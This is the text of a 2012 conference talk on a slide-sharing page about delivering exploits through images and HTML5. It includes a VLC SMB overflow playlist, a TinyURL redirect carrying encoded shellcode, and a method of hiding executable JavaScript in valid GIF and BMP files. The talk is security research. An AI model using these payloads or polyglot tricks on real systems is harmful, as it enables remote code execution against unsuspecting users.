INNOVATIVE EXPLOIT DELIVERY VIA IMAGES AND HTML5
•
3 likes•2,349 views
The document discusses innovative ways to deliver exploits, including encoding them in image file formats by using the image's alpha channel or pixel values to represent exploit code. Specific techniques demonstrated include encoding exploits in GIF and BMP images, using HTML5 canvas to decode and execute the encoded JavaScript, and shortening encoded exploit URLs with services like TinyURL. The presentation concludes by considering potential future avenues for this approach using emerging web technologies.
Recommended
More Related Content
Similar to INNOVATIVE EXPLOIT DELIVERY VIA IMAGES AND HTML5
Similar to INNOVATIVE EXPLOIT DELIVERY VIA IMAGES AND HTML5 (20)
More from Saumil Shah
More from Saumil Shah (20)
Recently uploaded
Recently uploaded (20)
INNOVATIVE EXPLOIT DELIVERY VIA IMAGES AND HTML5
- 1. INNOVATIVE EXPLOIT DELIVERY SAUMIL SHAH net-square HITB2012KUL
- 2. # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University. • saumil@net-square.com • LinkedIn: saumilshah • Twitter: @therealsaumil net-square
- 3. My area of work Penetration Reverse Exploit Testing Engineering Writing New Offensive Attack Research Security Defense Conference "Eyes and Speaker ears open" net-square
- 4. When two forces combine... Web Binary Hacking Exploits net-square
- 5. SNEAKY LETHAL net-square
- 6. net-square
- 7. 302 IMG JS HTML5 net-square
- 8. net-square
- 9. VLC smb overflow • smb://example.com@0.0.0.0/foo/#{AAAA AAAA....} • Classic Stack Overflow. net-square
- 10. VLC XSPF file <?xml version="1.0" encoding="UTF-8"?> <playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> <title>Playlist</title> <trackList> <track> <location> smb://example.com@0.0.0.0/foo/#{AAAAAAAA....} </location> <extension application="http://www.videolan.org/vlc/playlist/0"> <vlc:id>0</vlc:id> </extension> </track> </trackList> </playlist> net-square
- 11. Alpha Encoded Tiny ZOMFG Exploit URL net-square
- 12. 100% Pure Alphanum! net-square
- 13. VLC smb overflow - HTMLized!! <embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" /> net-square
- 14. 301 Redirect from tinyurl HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/5.2.12 Location: smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAX P0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNO QeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBAB XP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoLKPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIP QdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHkPfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJc EaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxHkEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOs IPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDnCUCHPeEPAA} Content-type: text/html Content-Length: 0 Connection: close Server: TinyURL/1.6 net-square
- 15. net-square
- 16. Exploits as Images - 1 • Grayscale encoding (0-255). • 1 pixel = 1 character. • Perfectly valid image. • Decode and Execute! net-square
- 17. net-square
- 18. I'm an evil Javascript I'm an innocent image net-square
- 20. net-square c) no eval()
- 21. Same Same No Different! var a = eval(str); a = (new Function(str))(); net-square
- 23. IMAJS Seeing is Believing net-square
- 24. Browser Support for IMAJS-GIF Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE no yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer no - 2f 2a 00 00 Win 7 Preview yes - net-square
- 25. Browser Support for IMAJS-BMP Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE yes yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer yes - 2f 2a 00 00 Win 7 Preview yes - net-square
- 26. e) The αq exploit net-square
- 27. Encode using Alpha channel net-square
- 28. Demo IMAJS αq FTW! net-square
- 29. f) ONE LAST DEMO!!! net-square
- 30. The FUTURE? HTML5 Video SVG WebGL Mobile Browsers net-square
- 31. KTHXBAI See you in 2013?? net-square saumil@net-square.com | @therealsaumil